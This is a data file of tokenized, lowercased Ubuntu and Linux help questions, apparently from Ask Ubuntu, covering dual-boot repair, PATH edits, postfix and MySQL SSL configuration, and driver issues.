432207	pure-ftpwho result on apache web server	i am new to programming and just simply need a guide from the experts . i have pure-ftpd service running on centos . running the command pure-ftpwho gives me the result below : + -- -- -- + -- -- -- -- -+ -- -- -- -+ -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | pid | login |for/spd| what | file/ip | + -- -- -- + -- -- -- -- -+ -- -- -- -+ -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | 7233 | login001| 00:00 | idle | - > xxx-xx-xx-xxx.mydomain.com | | '' | '' | '' | '' | | + -- -- -- + -- -- -- -- -+ -- -- -- -+ -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | 7532 | login002| 00:05 | idle | - > xxxxxx.xxxxx.com | | '' | '' | '' | '' | | + -- -- -- + -- -- -- -- -+ -- -- -- -+ -- -- -- + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ or pure-ftpwho -s 7233|login001|56|idle||xxx-xx-xx-xxx.mydomain.com|ftpserver1|21|0|0|0|0 7532|login002|338|idle||xxxxxx.xxxxx.com|ftpserver1|21|0|0|0|0 i have another server running apache web service and i am thinking of creating an html or php page that will display the result . please guide on how i could write this code to achieve this or point me in the right direction . sorry if this is not an acceptable question . thanks
432208	can not enter password in lock screen dialog after long suspend	i am currently using ubuntu 13.10 and recently i 've noticed that after my asus k56cb laptop goes into suspend mode , and is left like that for a long time ( about an hour or more ) , the password input field in the lock screen dialogue seems to be inactive ( greyed out ) after i 've resumed the session , restricting me from entering my password . clicking on it using the mouse pointer does n't bring it into focus either . the only work around is to click the switch user button and then re-enter my password in ubuntu 's main login screen . i know this is n't a major issue but this extra step really annoys me especially when i know that it works for short suspends . thanks in advance for any help .
432210	protecting live usb from windows viruses	ever since i started using linux , i said good bye to windows forever . i always carry live usb linux alongwith me ( these days , i am trying lxle for instance ) . i use the same pen drive to copy data . though , windows viruses do not affect the linux os but when i connect the pen drive to windows os they infect the other data files . is there anyway to protect the pen drive itself from windows viruses ? i was thinking of creating two partitions : ext4 fat32 the second partition can contain some sort of software using which i can transfer data to ext4 partition as i understand ext4 partitions are secure from windows viruses . does this appear feasible ?
432217	command line to add a directory to the path if it 's not already there	in regular way to add a directory to path : path= $ path : /new-directory now the problem is if you add a new directory to the path then it will be added without checking if it 's already in the path or not . for example : echo $ path gives : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games now if i add /usr/bin : path= $ path : /usr/bin then path becomes : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/bin so , if you can notice , now /usr/bin is repeated . so , how can i add a new directory to the path without repeating ?
432220	ubuntu 13.10 no interface in admin account	i just installed ubuntu for the first time on my dell inspirion 1720 with an ssd . i created a dual boot so i can run windows and ubuntu , but when i log in to my admin account i have no interface . i can rightclick and add folders etc . but that 's it , no toolbars , no icons . when i switch to a guest account suddenly all the interface elements are there . i made a non-admin account , and also in that one i have my interface . so , the problem is that i have no interface when i login to my administrator account . but when i use guest or non-admin accounts , i do have the interface . does anyone have some experience with this ?
432225	where to find the images for old ubuntu beta releases ?	as a developer and a power user , i 'd like to know from where can i download the images for old betas like , saucy beta , quantal beta , and some eol beta releases .
432226	password in plain text in ubuntu 12.04 unity	every time i use ctrl+alt+backspace , either to log out or to recover from system crash , i can see my login password on screen in plain text ! how is this possible ? can i solve this bug or i should i change my linux distribution ?
432228	remap the middle click action of logitech t400 wireless mouse	i want to remap the functionality of the front part of middle click and back part of middle click on the logitech zone touch mouse t400 model . according to the answer in this question , i tried the commands but i do n't understand what to exactly swap . here is the output for the command xinput list-props id # ( 10 being the device id ) nirmik @ nirmik : ~ $ xinput list-props 10 device 'logitech unifying device . wireless pid:4026 ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 256 ) : 0 device accel constant deceleration ( 257 ) : 1.000000 device accel adaptive deceleration ( 258 ) : 1.000000 device accel velocity scaling ( 259 ) : 10.000000 device product id ( 251 ) : 1133 , 50475 device node ( 252 ) : `` /dev/input/event6 '' evdev axis inversion ( 653 ) : 0 , 0 evdev axes swap ( 655 ) : 0 axis labels ( 656 ) : `` rel x '' ( 144 ) , `` rel y '' ( 145 ) , `` rel horiz wheel '' ( 650 ) , `` rel dial '' ( 651 ) , `` rel vert wheel '' ( 652 ) button labels ( 657 ) : `` button left '' ( 137 ) , `` button middle '' ( 138 ) , `` button right '' ( 139 ) , `` button wheel up '' ( 140 ) , `` button wheel down '' ( 141 ) , `` button horiz wheel left '' ( 142 ) , `` button horiz wheel right '' ( 143 ) , `` button side '' ( 645 ) , `` button extra '' ( 646 ) , `` button forward '' ( 647 ) , `` button back '' ( 648 ) , `` button task '' ( 649 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) , `` button unknown '' ( 643 ) evdev middle button emulation ( 658 ) : 0 evdev middle button timeout ( 659 ) : 50 evdev third button emulation ( 660 ) : 0 evdev third button emulation timeout ( 661 ) : 1000 evdev third button emulation button ( 662 ) : 3 evdev third button emulation threshold ( 663 ) : 20 evdev wheel emulation ( 664 ) : 0 evdev wheel emulation axes ( 665 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 666 ) : 10 evdev wheel emulation timeout ( 667 ) : 200 evdev wheel emulation button ( 668 ) : 4 evdev drag lock buttons ( 669 ) : 0 and the output of the next command xinput get-button-map 10 is 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 now what do i exactly swap to change the middle click to front part of middle click = middle click action . from/instead of front part of middle click = super button
432238	what do i need to do to connect to public wifi in a local shop ?	i go into a local coffee shop with public wifi and try to connect . the connection shows up in network manager so i click on it and it says it is connected . apparently the next thing i should do is open a browser and accept the acceptable use policy . however when i open firefox it just shows the start page which i 'm assuming is local and if i try to go anyplace on the internet says `` connecting '' and never goes anyplace . how am i supposed to get to the `` acceptable use '' page ? the network manager is set to automatic for everthing and when i sit down and click connect on the indicator icon , after it says connected , it appears to be ready to go . if i edit things in the connection properties that i know will cause it to fail the browser shows the `` server not found '' page when i try to access the internet , but if i leave everthing set to automatic and get the connection shown below it just freezes at `` connecting '' . i have tried firefox and chromium and they both act the same , but could there be something in the way i have my browsers configured that are n't allowing them to re-direct to the `` acceptable use '' page ? are there other tools that might help diagnose what is going on ? state : connected ( global ) - device : wlan0 [ timhortons-us-staging ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwl3945 state : connected default : yes hw address : < mac address removed > capabilities : speed : 54 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *timhortons-us-staging : infra , < mac address removed > , freq 2437 mhz , rate 54 mb/s , strength 67 ipv4 settings : address : 10.2.242.244 prefix : 16 ( 255.255.0.0 ) gateway : 10.2.1.1 dns : 208.67.222.222 dns : 208.67.220.220
432239	postfix does n't authenticate through /var/spool/postfix/var/run/saslauthd	i have a problem with postfix . i followed all description from https : //help.ubuntu.com/community/postfix . and it worked perfect except smtp authentication . i 've suffered that mail.log always told `` password verification fail '' when email sending through my server for a while . finally i reached that it all happened due to postfix chroot . my master.cf file is following . ========================================================================== smtp inet n - - - - smtpd # smtp inet n - - - 1 postscreen # smtpd pass - - - - - smtpd # dnsblog unix - - - - 0 dnsblog # tlsproxy unix - - - - 0 tlsproxy submission inet n - n - - smtpd when i once made symbol link of /var/spool/postfix/var/run/saslauthd at /var/run , it smtp worked well . but , this /var/run folder is volatile so this symbol link just gone after rebooting . moreover , i do n't see any this manual symbol link trick in official ubuntu documentation , which i want to avoid . any suggestion and advice for me ?
432242	ubuntu unable to access hard disk	i am running ubuntu 13.10 on my laptop . today suddenly , it is not able to mount the hard disks and gives following error error mounting /dev/sda3 at /media/zirael/1cc2ef99c2ef7584 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/zirael/1cc2ef99c2ef7584 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . please help as i am unable to figure this out .
432247	installing ubuntu on an existing windows system without creating a cd ?	this page says that , in order to add ubuntu on an existing windows system , i must burn ubuntu on a cd first . but cds are becoming less common these days , so i wonder if there is a way to install ubuntu without burning it on a cd ( or a dvd , or a usb stick ) - just download the iso to my windows machine and then somehow install it as dual boot . in the past i have tried to use wubi for that purpose , but this was not stable , and got stuck too many times . so now i want to create a dual-boot system .
432252	is it necessary to install amd graphics driver for ubuntu ?	currently i 'm using ubuntu 12.04 . previously i 've used dual boot ( ubuntu 13.04 / windows 7 ) , both os configured with ati catalyst center . but few days back both os started to crash . ubuntu 13.04 freezes to death , i ca n't even switch to cli . other os error log indicated that it was due to graphics driver . now i ca n't re-install ubuntu 13.04-amd64 . till now 12.04 working fine without additional graphics driver . is it necessary to install ati cc , if i continue without ati driver does it harm my system . i 've 1gb ati radeon hd 5470 , please ask if you need any additional info .
432254	ssl is not in use on mysql server	i installed mysql server and i want to allow ssl support . i added these lines to my.cnf [ client ] ssl-ca=/etc/mysql/ca-cert.pem ssl-cert=/etc/mysql/client-cert.pem ssl-key=/etc/mysql/client-key.pem [ mysqld ] ssl-ca=/etc/mysql/ca-cert.pem ssl-cert=/etc/mysql/server-cert.pem ssl-key=/etc/mysql/server-key.pem ssl-cipher=dhe-rsa-aes256-sha i created certificates openssl genrsa -out ca-key.pem 2048 ; openssl req -new -x509 -nodes -days 1000 -key ca-key.pem -out ca-cert.pem ; openssl req -newkey rsa:2048 -days 1000 -nodes -keyout server-key.pem -out server-req.pem ; openssl x509 -req -in server-req.pem -days 1000 -ca ca-cert.pem -cakey ca-key.pem -set_serial 01 -out server-cert.pem ; openssl req -newkey rsa:2048 -days 1000 -nodes -keyout client-key.pem -out client-req.pem ; openssl x509 -req -in client-req.pem -days 1000 -ca ca-cert.pem -cakey ca-key.pem -set_serial 01 -out client-cert.pem ; i changed chown to mysql for *.pem certicates -rw-r -- r -- 1 mysql mysql 1407 mar 10 13:00 ca-cert.pem -rw-r -- r -- 1 mysql mysql 1675 mar 10 12:50 ca-key.pem -rw-r -- r -- 1 mysql mysql 1277 mar 10 14:29 client-cert.pem -rw-r -- r -- 1 mysql mysql 1704 mar 10 14:29 client-key.pem -rw-r -- r -- 1 mysql mysql 1045 mar 10 14:29 client-req.pem -rw-r -- r -- 1 mysql mysql 1277 mar 10 14:28 server-cert.pem -rw-r -- r -- 1 mysql mysql 1708 mar 10 14:28 server-key.pem -rw-r -- r -- 1 mysql mysql 1045 mar 10 14:28 server-req.pem then i restarted mysql server and i logged to service like root and checked the status . but it is still showing that ssl is not in use . what i did wrong ?
432255	what is $ display environment variable	i am new to shell script not able to understand what is $ display environment variable . i am running ubuntu 13.10 and using /bin/bash shell . i have connected two monitors . questions : echo $ display will print :0.0 on my machine ( on both monitors ) . what this means ? in which case $ display will be blank or null ? are there any articles or tutorials on this ?
432259	transfer sound with my powerpoint ?	so we have a powerpoint to present . i made the powerpoint on one computer and it had different sounds . well we emailed the powerpoint to others and they got it but it did not transfer the sounds . we need the powerpoint on another computer to present it but we need the sound too . what should we do ? ?
432264	what does noirqpoll kernel option actually do ?	i 've recently been troubleshooting a boot issue with ubuntu . first i tried 13.10 , and when that booted wrong i am now on 14.04 development . what would happen is that my computer would crash shortly after grub but before the purple ubuntu splash screen . the computer would remain on , but be unresponsive , no ping , no ssh . the monitor would turn off , like my computer was powered down . here is my forum thread that helped me 'solve ' this issue : http : //ubuntuforums.org/showthread.php ? t=2210142 . anyways , what 'solved ' the problem for me was adding noirqpoll kernel option . the irqpoll option is described as : when an interrupt is not handled search all handlers for it . also check all handlers each timer interrupt . intended to get systems with badly broken firmware running . but there was no description of noirqpoll . i 'm guessing it does the opposite and prevents the system from looking at all the handlers ? i guess my question is : why did this fix my computer ? will this option have any side effects ? could there be another option that works better ?
432265	ubuntu installation	i just tried to install ubuntu 13.10 , everything starts normal , language : english , have internet connection , enough hdd space , select downloading updates and third-party software and when i click on continue it gets stuck . i wait for ( maybe ) 2 min but nothing happens , so i quit but nothing change . so i press reset . windows works normally and no hdd memory wasted . and i delete some unnecessary files ( 7gb ) and try again to install this os , but again same story . but after i quit and wait for 1 min i press alt gr + ctrl + delete and it is normally entering in ubuntu - it works ; launch the program was slow but they worked and i could restart but it was just a windows and no hdd memory taken . did anyone know what happened , why is it such and why is it running on alt gr + ctrl + delete i am gon na try again to download and install os i try again to install its the same , just this time when i quit and press buttons its show black cross , maybe i didnt wait for that long . i try to install 32bit os and i already have this os fut it was formated d : so i need return win xp to recovery data . and im using usb for not dvd , and ped drive , of course .
432266	how to use a classic menu with unity ?	am not talking about drop down menu indicators , i need a classic menu i can place it at the unity launcher so it will be a good navigator with a lot of tools .
432269	updating an old ubuntu usb installer	i found an old usb stick that contains an ubuntu 10.04 installer . i want to install ubuntu on my windows machine , but i want 12.04 , not 10.04 . can i update the usb stick to install 12.04 , without wiping it out first ?
432274	how to prevent users from deleting files that are already in use ?	consider this scenario : user is executing a command on a file . this file becomes 'in-use ' now . $ tail -f somefile.log in another shell , user deletes the file . $ rm somefile.log now , this file is 'removed ' . meaning the only hardlink to the file inode is gone . if you execute the following command , you can still see the file , indicated as 'deleted ' . $ lsof | grep somefile.log disk space used by somefile.log is not released until user interrupts tail command in this case . my question is , is it possible to prevent users from deleting files that are in-use at the moment of deletion attempt ( similar to windows ) ? is it possible to use pam for this ?
432277	autoclicker for ubuntu	i 've tried to search many places for an autoclicker i need one to use it in a game . and i found one here : from murguu i downloaded it , but i have no idea how to install it states that it is for ubuntu , but i 'm new to this and do n't know what to do . also , i tried some forum answers and got to know that by changing the permission of the automouseclick.sh to `` allow executing file as program '' but it always unchecks itself every time i check it . it does n't let me change anything from the `` permission '' tab please help - thanks edit my ubuntu version is 12.04 linux superfast 3.8.0-35-generic # 52~precise1-ubuntu smp thu jan 30 17:24:40 utc 2014 x86_64 x86_64 x86_64 gnu/linux yeah ! got it ! i do n't know how it worked but it 's working now . i had extracted it in a drive called `` storage '' and used to launch . now , instead of putting it anywhere , i just extracted it on desktop and launched it 's not working thank you all for your support ! thanks a lot : d -jack
432283	how to find all dependent ( dependency walker ) packages before installing a .deb file ?	when installing ubuntu core 13.10 according to the instructions at wiki.ubuntu.com/core/installationexample , step 5 says that ubuntu 12.04 `` precise pangolin '' development kernel requires the 'wireless-crda ' package . this wiki suggest to have a look at packages.ubuntu.com . however the precise/linux-image-3.8.0-37-generic page does n't even mention the 'wireless-crda ' package at all . after reading the ask ubuntu articles for 'download +kernel +packages +deb ' , ' '' depends on '' +kernel +packages ' , 'wireless-crda ' and `` how to automatically fetch missing dependencies when installing software from .deb ? '' i still do n't know how to figure out all dependent packages . update # 1 the answers from how can i check dependency list for a deb package 1. apt-cache showpkg linux-image-3.11.0-18-generic does n't output a 'wireless-crda ' dependency : reverse depends : linux-image-3.11.0-18-generic : i386 , linux-image-3.11.0-18-generic linux-signed-image-3.11.0-18-generic , linux-image-3.11.0-18-generic 3.11.0-18.32 linux-image-virtual , linux-image-3.11.0-18-generic linux-image-generic , linux-image-3.11.0-18-generic linux-image-extra-3.11.0-18-generic , linux-image-3.11.0-18-generic dependencies : 3.11.0-18.32 - initramfs-tools ( 2 0.36ubuntu6 ) module-init-tools ( 2 3.3-pre11-4ubuntu3 ) dpkg ( 2 1.10.24 ) fdutils ( 0 ( null ) ) linux-doc-3.11.0 ( 16 ( null ) ) linux-source-3.11.0 ( 0 ( null ) ) linux-tools ( 0 ( null ) ) linux-headers-3.11.0-18-generic ( 0 ( null ) ) grub-pc ( 16 ( null ) ) grub-efi-amd64 ( 16 ( null ) ) grub-efi-ia32 ( 16 ( null ) ) grub ( 16 ( null ) ) lilo ( 2 19.1 ) hotplug ( 3 0.0.20040105-1 ) hotplug : i386 ( 3 0.0.20040105-1 ) linux-image-3.11.0-18-generic : i386 ( 0 ( null ) ) provides : 3.11.0-18.32 - redhat-cluster-modules linux-image-3.0 linux-image kvm-api-4 ivtv-modules fuse-module reverse provides : 2. dpkg -i linux-image-3.11.0-18-generic_3.11.0-18.32_amd64.deb also does n't output a 'wireless-crda ' dependency : depends : initramfs-tools ( > = 0.36ubuntu6 ) , module-init-tools ( > = 3.3-pre11-4ubuntu3 ) recommends : grub-pc | grub-efi-amd64 | grub-efi-ia32 | grub | lilo ( > = 19.1 ) suggests : fdutils , linux-doc-3.11.0 | linux-source-3.11.0 , linux-tools , linux-headers-3.11.0-18-generic conflicts : hotplug ( < < 0.0.20040105-1 ) provides : fuse-module , ivtv-modules , kvm-api-4 , linux-image , linux-image-3.0 , redhat-cluster-modules when installing the kernel through apt-get install linux- { headers , image } -generic there is a depending 'wireless-crda ' package . question : how to find out - before actually installing the ubuntu kernel .deb file - all dependent packages that need to be installed ?
432284	are hard links equivalent to windows shortcuts ?	wikipedia defines a hard link as : a directory entry that associates a name with a file on a file system . ( a directory is itself a special kind of file that contains a list of such entries . ) the term is used in file systems which allow multiple hard links to be created for the same file . i am wondering if the concept of hard link is equivalent to the windows concept of shortcut . if hard links are not equivalent to shortcuts , then what 's the closest windows feature to hard links ?
432285	access denied or repository not exported when download android source code	i am trying to download android_4.2_r1 source code . and i am using ubuntu 12.04 . i 've installed jdk 1.6 , python 2.7 , git.. i downloaded repo use this code $ curl http : //code.google.com/p/git-repo/downloads/detail ? name=repo-1.12 ~/bin/repo ( since the official one is forbidden in china ... ) anyway , i initiated repo successfully . but when i try to repo sync i meet the error : brendon @ brendon-lenovo : ~/android4.2/.repo $ repo sync fatal : remote error : access denied or repository not exported : /platform/abi/cpp.git error : can not fetch platform/abi/cpp does anyone know the reason ? thank you ! does this have anything to do with my path : brendon @ brendon-lenovo : ~ $ $ path bash : /home/brendon/bin : /home/brendon/bin : /bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games :
432292	what 's the 'envelope ' icon in the top panel and do i need it ?	after a default ubuntu 12.04 install on a new system , there always seems to be some 'envelope ' icon on the menu bar at the top . if i click it , a menu appears with available , away , busy , offline etc . small screenshot : what is it , and do i need it ? or can i get rid of it , and how ? i rather not have anything make unnecessary connections or poll my online status or whatever .
432294	dual boot disaster . professional help needed	i 've had a disaster and need professional help . to establish if i have lost windows 8 entirely from no1 disk , this was professionally installed by the local microsoft dealer , along with a second ( new ) solid state 250 gb hard drive for the 12.04 install . i installed 12.04 to disk no2 , after ensuring i had the `` boot order '' correctly sorted and found no2 disk with no operating system on it . but something went wrong and it installed onto disk no1. ? i found i had problem after i ran boot repair , as windows 8 did not appear in the ubuntu start up menu . 12.04 appears to be working 100 % on diskno1 . i also ran the unistall part of the boot repair programme , according to that there is only 12.04 on the disk . though ; looking at the disk utility programme , there are two 8.5 gb partitions , one says `` extended '' , and the other says `` unknown '' . could windows be in the unknown partition ? is there a specialist in or around the stevenage area , ( hertfordshire uk ) , who could do the necessary repairs and upgrades to my cruz microsystems , model itx system . sudo fdisk -l -u [ sudo ] password for dennis : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00058e9e device boot start end blocks id system /dev/sda1 * 2048 471834623 235916288 83 linux /dev/sda2 471836670 488396799 8280065 5 extended /dev/sda5 471836672 488396799 8280064 82 linux swap / solaris disk /dev/sdb : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1efd1efc disk /dev/sdb does n't contain a valid partition table disk /dev/mapper/cryptswap1 : 8478 mb , 8478785536 bytes 255 heads , 63 sectors/track , 1030 cylinders , total 16560128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcef7eac1 disk /dev/mapper/cryptswap1 does n't contain a valid partition table model : ata samsung ssd 840 ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 242gb 242gb primary ext4 boot 2 242gb 250gb 8479mb extended 5 242gb 250gb 8479mb logical error : /dev/sdb : unrecognised disk label model : linux device-mapper ( crypt ) ( dm ) disk /dev/mapper/cryptswap1 : 8479mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 8479mb 8479mb linux-swap ( v1 )
432296	missing operating system ( booting problems )	i accidentally formated my windows 7 partition which was in c , now at start up i get the `` missing operating system '' message . i also have two other partitions d , e and the ubuntu partition u ( 20gb ) . i tried to reinstall ubuntu but now i ca n't boot from the dvd .
432299	is there a way to install the kde plazma without kubuntu ? how ?	i want to install the kde without the kubuntu ... can you help me please ? i wonder..
432305	12.04 64bit and d-link dwn-156	has anyone got a d-link dwm-156 working successfully on 12.04 64bit please . i have tried just about everything i find on google with no success . it is a version 7 model sold by telkom south africa in a starter pack . it works fine on xp which i installed to test if the modem was faulty . i have also tried to get it working from a 13.10 live cd with no success there either . thanks in advance . miles
432308	after upgrade i can not type in any windows	i run ubuntu 13.10 on a 64 bits machine . last friday i had an automatic update . after that i can not type in any window , terminal , gedit , firefox ... but i can navigate my files in file explorer using cursor keys and pressing f2 to edit a file name ( which i own ) i enter in edit mode but then i can not key in anything . in software center i can uninstall a program , when prompted for password i can key it in so the uninstallation works . inside xbmc the keyboard works fine . i think it is a `` permission '' issue , that is my userid lost somehow its authority , but i do n't know where to look . uname -a linux cips-ubuntu 3.11.0-18-generic # 32-ubuntu smp tue feb 18 21:11:14 utc 2014 x86_64 x86_64 x86_64 gnu/linux wmctrl -m name : compiz class : n/a pid : n/a window manager 's `` showing the desktop '' mode : off ps -afe |grep compiz emanuele 1914 1552 0 mar07 ? 00:22:49 compiz emanuele 21858 20207 0 11:08 pts/7 00:00:00 grep -- color=auto compiz update : i can copy/paste but i can not type in . ok , i have this : grep ema /etc/passwd emanuele : x:1000:1000 : emanuele , , , :/home/emanuele : /bin/bash ls -l /bin/*bash* -rwxr-xr-x 1 root root 959168 mar 30 2013 /bin/bash lrwxrwxrwx 1 root root 4 gen 11 20:08 /bin/rbash - > bash
432321	gpodder not recognising ipod classic	in the past ( on ubuntu 12.04 lts ) , i used gpodder without any problems to download and sync my podcasts with my ipod classic , however , now on ubuntu 13.10 and with gpodder 3.5.1 , my ipod is simply not being recognised . ubuntu itself recognises the ipod ( as does itunes itself on the windows 8 boot ) . what could be the problem ? what things could i try to get gpodder to find my ipod ?
432322	gstreamer error : mp4 files and thumbnails does n't work	i think i have done something , but i ca n't tell what exactly ... now , my ubuntu does n't want to decode mpeg-4 and h.264 video-files ( files extensions .avi .mp4 ) . vlc still works ( of course , it has built-in codecs ) but totem and the thumbnailer stopped working . here 's what i did recently that might be related : sudo apt-get install libvo-aacenc-dev libx264-dev libtheora-dev librtmp-dev libvorbis-dev libfdk-aac-dev libmp3lame-dev libfaac-dev libpulse-dev libxvidcore-dev i used them to build libav-toolsfrom git . now libavworks like a charm , and that makes me think that my libx264 is fine ( which is , i think , used to decode h.264 and mpeg-4 ) . i have this error message : $ âś totem video.mp4 ** message : missing plugin : gstreamer|1.0|totem|h.264 decoder|decoder-video/x-h264 , stream-format= ( string ) avc , alignment= ( string ) au , level= ( string ) 3.2 , profile= ( string ) main , parsed= ( boolean ) true ( h.264 decoder ) i also tried this and i have plenty of gstreamer-* package installed . can you help me ?
432325	how can i get rid of the `` en '' icon in the notification area ?	how can i get rid of the keyboard indicator icon in the notification area ? i am running ubuntu 13.10
432333	how to unistall 13.10 on a dual boot xp machine	i am new to linux in general . as i am sure is the case with many of the new converts , i have an old xp machine that is getting slow and about to be unsupported so i decided to test the waters . i installed 13.10 along side xp only to find that my graphics chip does n't support the unity interface upgrade in 13.10 ( no launcher , icons , etc ) . i did download 12.04 after the fact and confirmed that its interface does work ( ran it from a flash drive ) . as i see it , i have 2 options : try to downgrade ( which is officially unsupported ) or remove 13.10 and install 12.04 fresh . i looked up the process on removing 13.10 , which is pretty simple ( wipe out the partitions containing ubunutu ) , but it also takes grub with it . i downloaded and tried to run easybcd to restore the master boot record , but it does not support xp home . i do n't have the original xp disc to repair it via that avenue either . do i have any other options here that i do n't know about ? thanks !
432334	unity scope to read xmp metadata from local files	i have seen various tutorials on writing unity scopes , including the one on developer.ubuntu.com however , they all appear to concentrate on scopes that download data from various web services . i am looking for a scope that can read xmp from jpg files on the local filesystem . is such a thing doable ?
432335	gnome 3.4 does n't work correctly ( ubuntu 12.04 fresh install )	in this morning i have installed ubuntu gnome 12.04 . it was installed in my laptop and before . after i have modified a configuration file of a extension i pressed alt+f2 , next i typed r and pressed enter . and now nothing works . i ca n't modify the configurations of interface ( the wallpaper also ca n't be charged ) and the favorites of lancer reset after reboot . i can enable maxim one extension . in the user menu it does n't exist the option shutdown . the interface froze at each forcing . what i can do ?
432337	why are the ports not open ?	i have a server which can be pinged , and if i look it up , you can see it 's ip address . although , i have forwarded the ports necessary ( 25565 ) on my router and i still ca n't listen on that port . my iptables rules allow connections through port 25565 . what other rules do i need for connections to reach it ? i have configured a static internal ip and forwarded it in my router config but it still wo n't work .
432342	ubuntu not loading on startup	today , i 've tried to open my pc with windows 8.1 and ubuntu installed . i always have windows as my first-boot system in the bios , because is the one i use the most . yesterday i was with ubuntu and i could load it perfectly . but today , when i tried to open it , it gave me an error : the boot disk was not detected or the disk has failed . what 's the problem here ? i really need to access to my ubuntu ! ! also , when i try to boot from a usb with a repair tool burned into it , the bootmenu loader does n't detect my usb , but in my bios , if i go to devices settings , i can see my usb . what can i do ? thanks .
432344	mouse lagging and blue lines after fglrx uninstall	i recently tried installing amd drivers from the official website and found out that my card was no longer supported so i uninstalled it back . but i have this problem : when i get to my login screen , mouse is lagging ( freezing frequently ) and when i select unity or gnome as my desktop environment there are lots of blue lines on the screen ( selecting ubuntu 2d or gnome-classic without effects works well though ) . so i 'm guessing uninstallation process did n't work the way it should have ? i have reinstalled libgl1-mesa and xserver-xorg packages and reconfigured xorg . can anybody help please ?
432348	i can not access my server	i can not access my ubunto dedicated server ubuntu1204-server_64 using nx client each time i try to connect there is a connection error . nx client may be disabled on my host.. i need your help to access the server by any way
432349	win 8.1 / ubuntu dual boot mess - grub and mbr problems	almost a year ago , i upgraded my lenovo u410 to win 8.1 , and it screwed up my dual boot setup with ubuntu ( actually ubuntu studio ) . as i was swamped at the time with work , i put it off and did n't deal with it . now , i 'm trying to fix it , and i do n't even recall how it got screwed up . i believe , the windows boot manager was n't able to find linux , etc . then i did something dumb - i reformatted the partition that ubuntu was originally on and tried to install ubuntu on a newly formatted ssd drive . still nothing . i tried using easybcd to see if that could help , but no joy . here 's what it says when i try to boot into linux : \nst\nst_linux.mbr `` could n't be loaded '' here is the output from fdisk -l ( sda is the ssd with ubuntu , and sdb is the partition with windows ) : disk /dev/sda : 32.0 gb , 32017047552 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62533296 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0002220c device boot start end blocks id system warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xae4a2926 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdc : 15.7 gb , 15724707840 bytes 255 heads , 63 sectors/track , 1911 cylinders , total 30712320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 2048 30711807 15354880 c w95 fat32 ( lba ) disk /dev/sdd : 4007 mb , 4007657472 bytes 16 heads , 32 sectors/track , 15288 cylinders , total 7827456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00078e15 device boot start end blocks id system /dev/sdd1 * 8064 7827455 3909696 b w95 fat32 ubuntu-studio @ ubuntu-studio : ~ $ sudo fdisk -l disk /dev/sda : 32.0 gb , 32017047552 bytes 255 heads , 